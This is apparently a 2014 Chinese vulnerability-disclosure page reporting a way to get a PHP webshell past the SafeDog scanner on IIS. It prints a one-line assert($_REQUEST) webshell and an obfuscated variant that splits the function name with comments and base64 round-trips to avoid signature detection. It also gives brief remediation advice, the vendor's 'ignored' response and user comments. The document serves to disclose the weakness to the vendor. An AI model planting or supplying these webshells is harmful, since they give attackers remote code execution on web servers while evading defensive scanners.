奇淫巧技绕过安全狗webshell查杀

测试环境：windows2003

安全狗版本：iis3.3最新版

原形

<?php assert($_REQUEST["AG"]);?>

处理掉assert的函数原形即可绕过

<?php 
 
 $jm='MQ==';
 
 $s=base64_decode($jm);
 
 $a="a"./*-/*-*/"ss"./*-/*-*/"er"./*-/*-*/"t";
 
 $b=base64_encode($a); 
 
 $c=base64_decode($b);
 
 $c($_REQUEST[$s]);
 
 ?>

#1.增加相应的查杀库

#2.用正则过滤掉垃圾字符再用特征库识别效果会好一些

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-10-05 14:54

厂商回复：

最新状态：

暂无

1. 2014-07-15 22:54 | study_vul ( 实习白帽子 | Rank:62 漏洞数:9 | 我有乌云id了，我马上就要牛叉起来了)

   1

   奇技淫巧 厂商不要

   1# 回复此人

2. 2014-07-16 03:15 | 陈诺 ( 路人 | Rank:6 漏洞数:3 | 期待志同道合的人，不期而遇。我是大傻逼)

   0

   你猜我猜不猜

   2# 回复此人

3. 2014-07-16 15:59 | 邪恶大咖 ( 路人 | Rank:15 漏洞数:3 )

   0

   又是忽略，安全狗太坑！

   3# 回复此人

4. 2014-07-16 16:00 | 番茄师傅 ( 普通白帽子 | Rank:354 漏洞数:95 | http://www.tomatoyu.com/)

   0

   忽略、、、、、

   4# 回复此人

5. 2014-07-18 08:46 | Bloodwolf ( 实习白帽子 | Rank:47 漏洞数:8 | whoami)

   0

   一个脚本吧？那么多都可以绕过的。他们哪里看的过来！还是丢社区！大家一起拿着杀狗！然后他们就重视了！

   5# 回复此人